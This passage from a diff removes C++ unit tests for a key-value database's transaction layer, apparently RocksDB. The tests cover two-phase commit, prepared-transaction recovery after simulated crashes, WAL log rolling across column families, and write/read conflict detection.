-  delete txn;
-}
-
-TEST_P(TransactionTest, PersistentTwoPhaseTransactionTest) {
-  WriteOptions write_options;
-  write_options.sync = true;
-  write_options.disableWAL = false;
-  ReadOptions read_options;
-
-  TransactionOptions txn_options;
-
-  string value;
-  Status s;
-
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("xid");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(db->GetTransactionByName("xid"), txn);
-
-  // transaction put
-  s = txn->Put(Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-  ASSERT_EQ(1, txn->GetNumPuts());
-
-  // txn read
-  s = txn->Get(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  // regular db put
-  s = db->Put(write_options, Slice("foo2"), Slice("bar2"));
-  ASSERT_OK(s);
-  ASSERT_EQ(1, txn->GetNumPuts());
-
-  db_impl->TEST_FlushMemTable(true);
-
-  // regular db read
-  db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(value, "bar2");
-
-  // nothing has been prepped yet
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(), 0);
-
-  // prepare
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  // still not available to db
-  s = db->Get(read_options, Slice("foo"), &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  db->FlushWAL(false);
-  delete txn;
-  // kill and reopen
-  s = ReOpenNoDelete();
-  ASSERT_OK(s);
-  db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-
-  // find trans in list of prepared transactions
-  std::vector<Transaction*> prepared_trans;
-  db->GetAllPreparedTransactions(&prepared_trans);
-  ASSERT_EQ(prepared_trans.size(), 1);
-
-  txn = prepared_trans.front();
-  ASSERT_TRUE(txn);
-  ASSERT_EQ(txn->GetName(), "xid");
-  ASSERT_EQ(db->GetTransactionByName("xid"), txn);
-
-  // log has been marked
-  auto log_containing_prep =
-      db_impl->TEST_FindMinLogContainingOutstandingPrep();
-  ASSERT_GT(log_containing_prep, 0);
-
-  // value is readable from txn
-  s = txn->Get(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  // make commit
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  // value is now available
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  // we already committed
-  s = txn->Commit();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // no longer is prpared results
-  prepared_trans.clear();
-  db->GetAllPreparedTransactions(&prepared_trans);
-  ASSERT_EQ(prepared_trans.size(), 0);
-
-  // transaction should no longer be visible
-  ASSERT_EQ(db->GetTransactionByName("xid"), nullptr);
-
-  // heap should not care about prepared section anymore
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(), 0);
-
-  // but now our memtable should be referencing the prep section
-  ASSERT_EQ(log_containing_prep,
-            db_impl->TEST_FindMinPrepLogReferencedByMemTable());
-
-  db_impl->TEST_FlushMemTable(true);
-
-  // after memtable flush we can now relese the log
-  ASSERT_EQ(0, db_impl->TEST_FindMinPrepLogReferencedByMemTable());
-
-  delete txn;
-
-  // deleting transaction should unregister transaction
-  ASSERT_EQ(db->GetTransactionByName("xid"), nullptr);
-}
-
-// TODO this test needs to be updated with serial commits
-TEST_P(TransactionTest, DISABLED_TwoPhaseMultiThreadTest) {
-  // mix transaction writes and regular writes
-  const uint32_t NUM_TXN_THREADS = 50;
-  std::atomic<uint32_t> txn_thread_num(0);
-
-  std::function<void()> txn_write_thread = [&]() {
-    uint32_t id = txn_thread_num.fetch_add(1);
-
-    WriteOptions write_options;
-    write_options.sync = true;
-    write_options.disableWAL = false;
-    TransactionOptions txn_options;
-    txn_options.lock_timeout = 1000000;
-    if (id % 2 == 0) {
-      txn_options.expiration = 1000000;
-    }
-    TransactionName name("xid_" + std::string(1, 'A' + id));
-    Transaction* txn = db->BeginTransaction(write_options, txn_options);
-    ASSERT_OK(txn->SetName(name));
-    for (int i = 0; i < 10; i++) {
-      std::string key(name + "_" + std::string(1, 'A' + i));
-      ASSERT_OK(txn->Put(key, "val"));
-    }
-    ASSERT_OK(txn->Prepare());
-    ASSERT_OK(txn->Commit());
-    delete txn;
-  };
-
-  // assure that all thread are in the same write group
-  std::atomic<uint32_t> t_wait_on_prepare(0);
-  std::atomic<uint32_t> t_wait_on_commit(0);
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "WriteThread::JoinBatchGroup:Wait", [&](void* arg) {
-        auto* writer = reinterpret_cast<WriteThread::Writer*>(arg);
-
-        if (writer->ShouldWriteToWAL()) {
-          t_wait_on_prepare.fetch_add(1);
-          // wait for friends
-          while (t_wait_on_prepare.load() < NUM_TXN_THREADS) {
-            env->SleepForMicroseconds(10);
-          }
-        } else if (writer->ShouldWriteToMemtable()) {
-          t_wait_on_commit.fetch_add(1);
-          // wait for friends
-          while (t_wait_on_commit.load() < NUM_TXN_THREADS) {
-            env->SleepForMicroseconds(10);
-          }
-        } else {
-          FAIL();
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // do all the writes
-  std::vector<port::Thread> threads;
-  for (uint32_t i = 0; i < NUM_TXN_THREADS; i++) {
-    threads.emplace_back(txn_write_thread);
-  }
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  ReadOptions read_options;
-  std::string value;
-  Status s;
-  for (uint32_t t = 0; t < NUM_TXN_THREADS; t++) {
-    TransactionName name("xid_" + std::string(1, 'A' + t));
-    for (int i = 0; i < 10; i++) {
-      std::string key(name + "_" + std::string(1, 'A' + i));
-      s = db->Get(read_options, key, &value);
-      ASSERT_OK(s);
-      ASSERT_EQ(value, "val");
-    }
-  }
-}
-
-TEST_P(TransactionTest, TwoPhaseLongPrepareTest) {
-  WriteOptions write_options;
-  write_options.sync = true;
-  write_options.disableWAL = false;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-
-  std::string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("bob");
-  ASSERT_OK(s);
-
-  // transaction put
-  s = txn->Put(Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-
-  // prepare
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  delete txn;
-
-  for (int i = 0; i < 1000; i++) {
-    std::string key(i, 'k');
-    std::string val(1000, 'v');
-    s = db->Put(write_options, key, val);
-    ASSERT_OK(s);
-
-    if (i % 29 == 0) {
-      // crash
-      env->SetFilesystemActive(false);
-      ReOpenNoDelete();
-    } else if (i % 37 == 0) {
-      // close
-      ReOpenNoDelete();
-    }
-  }
-
-  // commit old txn
-  txn = db->GetTransactionByName("bob");
-  ASSERT_TRUE(txn);
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  // verify data txn data
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(s, Status::OK());
-  ASSERT_EQ(value, "bar");
-
-  // verify non txn data
-  for (int i = 0; i < 1000; i++) {
-    std::string key(i, 'k');
-    std::string val(1000, 'v');
-    s = db->Get(read_options, key, &value);
-    ASSERT_EQ(s, Status::OK());
-    ASSERT_EQ(value, val);
-  }
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, TwoPhaseSequenceTest) {
-  WriteOptions write_options;
-  write_options.sync = true;
-  write_options.disableWAL = false;
-  ReadOptions read_options;
-
-  TransactionOptions txn_options;
-
-  std::string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("xid");
-  ASSERT_OK(s);
-
-  // transaction put
-  s = txn->Put(Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-  s = txn->Put(Slice("foo2"), Slice("bar2"));
-  ASSERT_OK(s);
-  s = txn->Put(Slice("foo3"), Slice("bar3"));
-  ASSERT_OK(s);
-  s = txn->Put(Slice("foo4"), Slice("bar4"));
-  ASSERT_OK(s);
-
-  // prepare
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  // make commit
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-
-  // kill and reopen
-  env->SetFilesystemActive(false);
-  ReOpenNoDelete();
-
-  // value is now available
-  s = db->Get(read_options, "foo4", &value);
-  ASSERT_EQ(s, Status::OK());
-  ASSERT_EQ(value, "bar4");
-}
-
-TEST_P(TransactionTest, TwoPhaseDoubleRecoveryTest) {
-  WriteOptions write_options;
-  write_options.sync = true;
-  write_options.disableWAL = false;
-  ReadOptions read_options;
-
-  TransactionOptions txn_options;
-
-  std::string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("a");
-  ASSERT_OK(s);
-
-  // transaction put
-  s = txn->Put(Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-
-  // prepare
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  delete txn;
-
-  // kill and reopen
-  env->SetFilesystemActive(false);
-  ReOpenNoDelete();
-
-  // commit old txn
-  txn = db->GetTransactionByName("a");
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(s, Status::OK());
-  ASSERT_EQ(value, "bar");
-
-  delete txn;
-
-  txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("b");
-  ASSERT_OK(s);
-
-  s = txn->Put(Slice("foo2"), Slice("bar2"));
-  ASSERT_OK(s);
-
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-
-  // kill and reopen
-  env->SetFilesystemActive(false);
-  ReOpenNoDelete();
-
-  // value is now available
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(s, Status::OK());
-  ASSERT_EQ(value, "bar");
-
-  s = db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(s, Status::OK());
-  ASSERT_EQ(value, "bar2");
-}
-
-TEST_P(TransactionTest, TwoPhaseLogRollingTest) {
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-
-  Status s;
-  string v;
-  ColumnFamilyHandle *cfa, *cfb;
-
-  // Create 2 new column families
-  ColumnFamilyOptions cf_options;
-  s = db->CreateColumnFamily(cf_options, "CFA", &cfa);
-  ASSERT_OK(s);
-  s = db->CreateColumnFamily(cf_options, "CFB", &cfb);
-  ASSERT_OK(s);
-
-  WriteOptions wopts;
-  wopts.disableWAL = false;
-  wopts.sync = true;
-
-  TransactionOptions topts1;
-  Transaction* txn1 = db->BeginTransaction(wopts, topts1);
-  s = txn1->SetName("xid1");
-  ASSERT_OK(s);
-
-  TransactionOptions topts2;
-  Transaction* txn2 = db->BeginTransaction(wopts, topts2);
-  s = txn2->SetName("xid2");
-  ASSERT_OK(s);
-
-  // transaction put in two column families
-  s = txn1->Put(cfa, "ka1", "va1");
-  ASSERT_OK(s);
-
-  // transaction put in two column families
-  s = txn2->Put(cfa, "ka2", "va2");
-  ASSERT_OK(s);
-  s = txn2->Put(cfb, "kb2", "vb2");
-  ASSERT_OK(s);
-
-  // write prep section to wal
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-
-  // our log should be in the heap
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(),
-            txn1->GetLogNumber());
-  ASSERT_EQ(db_impl->TEST_LogfileNumber(), txn1->GetLogNumber());
-
-  // flush default cf to crate new log
-  s = db->Put(wopts, "foo", "bar");
-  ASSERT_OK(s);
-  s = db_impl->TEST_FlushMemTable(true);
-  ASSERT_OK(s);
-
-  // make sure we are on a new log
-  ASSERT_GT(db_impl->TEST_LogfileNumber(), txn1->GetLogNumber());
-
-  // put txn2 prep section in this log
-  s = txn2->Prepare();
-  ASSERT_OK(s);
-  ASSERT_EQ(db_impl->TEST_LogfileNumber(), txn2->GetLogNumber());
-
-  // heap should still see first log
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(),
-            txn1->GetLogNumber());
-
-  // commit txn1
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  // heap should now show txn2s log
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(),
-            txn2->GetLogNumber());
-
-  // we should see txn1s log refernced by the memtables
-  ASSERT_EQ(db_impl->TEST_FindMinPrepLogReferencedByMemTable(),
-            txn1->GetLogNumber());
-
-  // flush default cf to crate new log
-  s = db->Put(wopts, "foo", "bar2");
-  ASSERT_OK(s);
-  s = db_impl->TEST_FlushMemTable(true);
-  ASSERT_OK(s);
-
-  // make sure we are on a new log
-  ASSERT_GT(db_impl->TEST_LogfileNumber(), txn2->GetLogNumber());
-
-  // commit txn2
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  // heap should not show any logs
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(), 0);
-
-  // should show the first txn log
-  ASSERT_EQ(db_impl->TEST_FindMinPrepLogReferencedByMemTable(),
-            txn1->GetLogNumber());
-
-  // flush only cfa memtable
-  s = db_impl->TEST_FlushMemTable(true, cfa);
-  ASSERT_OK(s);
-
-  // should show the first txn log
-  ASSERT_EQ(db_impl->TEST_FindMinPrepLogReferencedByMemTable(),
-            txn2->GetLogNumber());
-
-  // flush only cfb memtable
-  s = db_impl->TEST_FlushMemTable(true, cfb);
-  ASSERT_OK(s);
-
-  // should show not dependency on logs
-  ASSERT_EQ(db_impl->TEST_FindMinPrepLogReferencedByMemTable(), 0);
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(), 0);
-
-  delete txn1;
-  delete txn2;
-  delete cfa;
-  delete cfb;
-}
-
-TEST_P(TransactionTest, TwoPhaseLogRollingTest2) {
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-
-  Status s;
-  ColumnFamilyHandle *cfa, *cfb;
-
-  ColumnFamilyOptions cf_options;
-  s = db->CreateColumnFamily(cf_options, "CFA", &cfa);
-  ASSERT_OK(s);
-  s = db->CreateColumnFamily(cf_options, "CFB", &cfb);
-  ASSERT_OK(s);
-
-  WriteOptions wopts;
-  wopts.disableWAL = false;
-  wopts.sync = true;
-
-  auto cfh_a = reinterpret_cast<ColumnFamilyHandleImpl*>(cfa);
-  auto cfh_b = reinterpret_cast<ColumnFamilyHandleImpl*>(cfb);
-
-  TransactionOptions topts1;
-  Transaction* txn1 = db->BeginTransaction(wopts, topts1);
-  s = txn1->SetName("xid1");
-  ASSERT_OK(s);
-  s = txn1->Put(cfa, "boys", "girls1");
-  ASSERT_OK(s);
-
-  Transaction* txn2 = db->BeginTransaction(wopts, topts1);
-  s = txn2->SetName("xid2");
-  ASSERT_OK(s);
-  s = txn2->Put(cfb, "up", "down1");
-  ASSERT_OK(s);
-
-  // prepre transaction in LOG A
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-
-  // prepre transaction in LOG A
-  s = txn2->Prepare();
-  ASSERT_OK(s);
-
-  // regular put so that mem table can actually be flushed for log rolling
-  s = db->Put(wopts, "cats", "dogs1");
-  ASSERT_OK(s);
-
-  auto prepare_log_no = txn1->GetLogNumber();
-
-  // roll to LOG B
-  s = db_impl->TEST_FlushMemTable(true);
-  ASSERT_OK(s);
-
-  // now we pause background work so that
-  // imm()s are not flushed before we can check their status
-  s = db_impl->PauseBackgroundWork();
-  ASSERT_OK(s);
-
-  ASSERT_GT(db_impl->TEST_LogfileNumber(), prepare_log_no);
-  ASSERT_GT(cfh_a->cfd()->GetLogNumber(), prepare_log_no);
-  ASSERT_EQ(cfh_a->cfd()->GetLogNumber(), db_impl->TEST_LogfileNumber());
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(),
-            prepare_log_no);
-  ASSERT_EQ(db_impl->TEST_FindMinPrepLogReferencedByMemTable(), 0);
-
-  // commit in LOG B
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  ASSERT_EQ(db_impl->TEST_FindMinPrepLogReferencedByMemTable(), prepare_log_no);
-
-  ASSERT_TRUE(!db_impl->TEST_UnableToFlushOldestLog());
-
-  // request a flush for all column families such that the earliest
-  // alive log file can be killed
-  db_impl->TEST_HandleWALFull();
-  // log cannot be flushed because txn2 has not been commited
-  ASSERT_TRUE(!db_impl->TEST_IsLogGettingFlushed());
-  ASSERT_TRUE(db_impl->TEST_UnableToFlushOldestLog());
-
-  // assert that cfa has a flush requested
-  ASSERT_TRUE(cfh_a->cfd()->imm()->HasFlushRequested());
-
-  // cfb should not be flushed becuse it has no data from LOG A
-  ASSERT_TRUE(!cfh_b->cfd()->imm()->HasFlushRequested());
-
-  // cfb now has data from LOG A
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  db_impl->TEST_HandleWALFull();
-  ASSERT_TRUE(!db_impl->TEST_UnableToFlushOldestLog());
-
-  // we should see that cfb now has a flush requested
-  ASSERT_TRUE(cfh_b->cfd()->imm()->HasFlushRequested());
-
-  // all data in LOG A resides in a memtable that has been
-  // requested for a flush
-  ASSERT_TRUE(db_impl->TEST_IsLogGettingFlushed());
-
-  delete txn1;
-  delete txn2;
-  delete cfa;
-  delete cfb;
-}
-/*
- * 1) use prepare to keep first log around to determine starting sequence
- * during recovery.
- * 2) insert many values, skipping wal, to increase seqid.
- * 3) insert final value into wal
- * 4) recover and see that final value was properly recovered - not
- * hidden behind improperly summed sequence ids
- */
-TEST_P(TransactionTest, TwoPhaseOutOfOrderDelete) {
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-  WriteOptions wal_on, wal_off;
-  wal_on.sync = true;
-  wal_on.disableWAL = false;
-  wal_off.disableWAL = true;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-
-  std::string value;
-  Status s;
-
-  Transaction* txn1 = db->BeginTransaction(wal_on, txn_options);
-
-  s = txn1->SetName("1");
-  ASSERT_OK(s);
-
-  s = db->Put(wal_on, "first", "first");
-  ASSERT_OK(s);
-
-  s = txn1->Put(Slice("dummy"), Slice("dummy"));
-  ASSERT_OK(s);
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-
-  s = db->Put(wal_off, "cats", "dogs1");
-  ASSERT_OK(s);
-  s = db->Put(wal_off, "cats", "dogs2");
-  ASSERT_OK(s);
-  s = db->Put(wal_off, "cats", "dogs3");
-  ASSERT_OK(s);
-
-  s = db_impl->TEST_FlushMemTable(true);
-  ASSERT_OK(s);
-
-  s = db->Put(wal_on, "cats", "dogs4");
-  ASSERT_OK(s);
-
-  db->FlushWAL(false);
-
-  // kill and reopen
-  env->SetFilesystemActive(false);
-  ReOpenNoDelete();
-
-  s = db->Get(read_options, "first", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "first");
-
-  s = db->Get(read_options, "cats", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "dogs4");
-}
-
-TEST_P(TransactionTest, FirstWriteTest) {
-  WriteOptions write_options;
-
-  // Test conflict checking against the very first write to a db.
-  // The transaction's snapshot will have seq 1 and the following write
-  // will have sequence 1.
-  Status s = db->Put(write_options, "A", "a");
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  txn->SetSnapshot();
-
-  ASSERT_OK(s);
-
-  s = txn->Put("A", "b");
-  ASSERT_OK(s);
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, FirstWriteTest2) {
-  WriteOptions write_options;
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  txn->SetSnapshot();
-
-  // Test conflict checking against the very first write to a db.
-  // The transaction's snapshot is a seq 0 while the following write
-  // will have sequence 1.
-  Status s = db->Put(write_options, "A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Put("A", "b");
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, WriteOptionsTest) {
-  WriteOptions write_options;
-  write_options.sync = true;
-  write_options.disableWAL = true;
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  ASSERT_TRUE(txn->GetWriteOptions()->sync);
-
-  write_options.sync = false;
-  txn->SetWriteOptions(write_options);
-  ASSERT_FALSE(txn->GetWriteOptions()->sync);
-  ASSERT_TRUE(txn->GetWriteOptions()->disableWAL);
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, WriteConflictTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "foo", "A");
-  db->Put(write_options, "foo2", "B");
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->Put("foo", "A2");
-  ASSERT_OK(s);
-
-  s = txn->Put("foo2", "B2");
-  ASSERT_OK(s);
-
-  // This Put outside of a transaction will conflict with the previous write
-  s = db->Put(write_options, "foo", "xxx");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "A");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "A2");
-  db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(value, "B2");
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, WriteConflictTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "foo", "bar");
-
-  txn_options.set_snapshot = true;
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn);
-
-  // This Put outside of a transaction will conflict with a later write
-  s = db->Put(write_options, "foo", "barz");
-  ASSERT_OK(s);
-
-  s = txn->Put("foo2", "X");
-  ASSERT_OK(s);
-
-  s = txn->Put("foo",
-               "bar2");  // Conflicts with write done after snapshot taken
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn->Put("foo3", "Y");
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-
-  ASSERT_EQ(2, txn->GetNumKeys());
-
-  s = txn->Commit();
-  ASSERT_OK(s);  // Txn should commit, but only write foo2 and foo3
-
-  // Verify that transaction wrote foo2 and foo3 but not foo
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-
-  db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(value, "X");
-
-  db->Get(read_options, "foo3", &value);
-  ASSERT_EQ(value, "Y");
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, ReadConflictTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "foo", "bar");
-  db->Put(write_options, "foo2", "bar");
-
-  txn_options.set_snapshot = true;
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn);
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  // This Put outside of a transaction will conflict with the previous read
-  s = db->Put(write_options, "foo", "barz");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  s = txn->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, TxnOnlyTest) {
-  // Test to make sure transactions work when there are no other writes in an
-  // empty db.
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->Put("x", "y");
-  ASSERT_OK(s);
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, FlushTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, Slice("foo"), Slice("bar"));
-  db->Put(write_options, Slice("foo2"), Slice("bar"));
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  s = txn->Put(Slice("foo"), Slice("bar2"));
-  ASSERT_OK(s);
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  // Put a random key so we have a memtable to flush
-  s = db->Put(write_options, "dummy", "dummy");
-  ASSERT_OK(s);
-
-  // force a memtable flush
-  FlushOptions flush_ops;
-  db->Flush(flush_ops);
-
-  s = txn->Commit();
-  // txn should commit since the flushed table is still in MemtableList History
-  ASSERT_OK(s);
-
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, FlushTest2) {
-  const size_t num_tests = 3;
-
-  for (size_t n = 0; n < num_tests; n++) {
-    // Test different table factories
-    switch (n) {
-      case 0:
-        break;
-      case 1:
-        options.table_factory.reset(new mock::MockTableFactory());
-        break;
-      case 2: {
-        PlainTableOptions pt_opts;
-        pt_opts.hash_table_ratio = 0;
-        options.table_factory.reset(NewPlainTableFactory(pt_opts));
-        break;
-      }
-    }
-
-    Status s = ReOpen();
-    ASSERT_OK(s);
-
-    WriteOptions write_options;
-    ReadOptions read_options, snapshot_read_options;
-    TransactionOptions txn_options;
-    string value;
-
-    DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-
-    db->Put(write_options, Slice("foo"), Slice("bar"));
-    db->Put(write_options, Slice("foo2"), Slice("bar2"));
-    db->Put(write_options, Slice("foo3"), Slice("bar3"));
-
-    txn_options.set_snapshot = true;
-    Transaction* txn = db->BeginTransaction(write_options, txn_options);
-    ASSERT_TRUE(txn);
-
-    snapshot_read_options.snapshot = txn->GetSnapshot();
-
-    txn->GetForUpdate(snapshot_read_options, "foo", &value);
-    ASSERT_EQ(value, "bar");
-
-    s = txn->Put(Slice("foo"), Slice("bar2"));
-    ASSERT_OK(s);
-
-    txn->GetForUpdate(snapshot_read_options, "foo", &value);
-    ASSERT_EQ(value, "bar2");
-    // verify foo is locked by txn
-    s = db->Delete(write_options, "foo");
-    ASSERT_TRUE(s.IsTimedOut());
-
-    s = db->Put(write_options, "Z", "z");
-    ASSERT_OK(s);
-    s = db->Put(write_options, "dummy", "dummy");
-    ASSERT_OK(s);
-
-    s = db->Put(write_options, "S", "s");
-    ASSERT_OK(s);
-    s = db->SingleDelete(write_options, "S");
-    ASSERT_OK(s);
-
-    s = txn->Delete("S");
-    // Should fail after encountering a write to S in memtable
-    ASSERT_TRUE(s.IsBusy());
-
-    // force a memtable flush
-    s = db_impl->TEST_FlushMemTable(true);
-    ASSERT_OK(s);
-
-    // Put a random key so we have a MemTable to flush
-    s = db->Put(write_options, "dummy", "dummy2");
-    ASSERT_OK(s);
-
-    // force a memtable flush
-    ASSERT_OK(db_impl->TEST_FlushMemTable(true));
-
-    s = db->Put(write_options, "dummy", "dummy3");
-    ASSERT_OK(s);
-
-    // force a memtable flush
-    // Since our test db has max_write_buffer_number=2, this flush will cause
-    // the first memtable to get purged from the MemtableList history.
-    ASSERT_OK(db_impl->TEST_FlushMemTable(true));
-
-    s = txn->Put("X", "Y");
-    // Should succeed after verifying there is no write to X in SST file
-    ASSERT_OK(s);
-
-    s = txn->Put("Z", "zz");
-    // Should fail after encountering a write to Z in SST file
-    ASSERT_TRUE(s.IsBusy());
-
-    s = txn->GetForUpdate(read_options, "foo2", &value);
-    // should succeed since key was written before txn started
-    ASSERT_OK(s);
-    // verify foo2 is locked by txn
-    s = db->Delete(write_options, "foo2");
-    ASSERT_TRUE(s.IsTimedOut());
-
-    s = txn->Delete("S");
-    // Should fail after encountering a write to S in SST file
-    ASSERT_TRUE(s.IsBusy());
-
-    // Write a bunch of keys to db to force a compaction
-    Random rnd(47);
-    for (int i = 0; i < 1000; i++) {
-      s = db->Put(write_options, std::to_string(i),
-                  test::CompressibleString(&rnd, 0.8, 100, &value));
-      ASSERT_OK(s);
-    }
-
-    s = txn->Put("X", "yy");
-    // Should succeed after verifying there is no write to X in SST file
-    ASSERT_OK(s);
-
-    s = txn->Put("Z", "zzz");
-    // Should fail after encountering a write to Z in SST file
-    ASSERT_TRUE(s.IsBusy());
-
-    s = txn->Delete("S");
-    // Should fail after encountering a write to S in SST file
-    ASSERT_TRUE(s.IsBusy());
-
-    s = txn->GetForUpdate(read_options, "foo3", &value);
-    // should succeed since key was written before txn started
-    ASSERT_OK(s);
-    // verify foo3 is locked by txn
-    s = db->Delete(write_options, "foo3");
-    ASSERT_TRUE(s.IsTimedOut());
-
-    db_impl->TEST_WaitForCompact();
-
-    s = txn->Commit();
-    ASSERT_OK(s);
-
-    // Transaction should only write the keys that succeeded.
-    s = db->Get(read_options, "foo", &value);
-    ASSERT_EQ(value, "bar2");
-
-    s = db->Get(read_options, "X", &value);
-    ASSERT_OK(s);
-    ASSERT_EQ("yy", value);
-
-    s = db->Get(read_options, "Z", &value);
-    ASSERT_OK(s);
-    ASSERT_EQ("z", value);
-
-  delete txn;
-  }
-}
-
-TEST_P(TransactionTest, NoSnapshotTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "AAA", "bar");
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
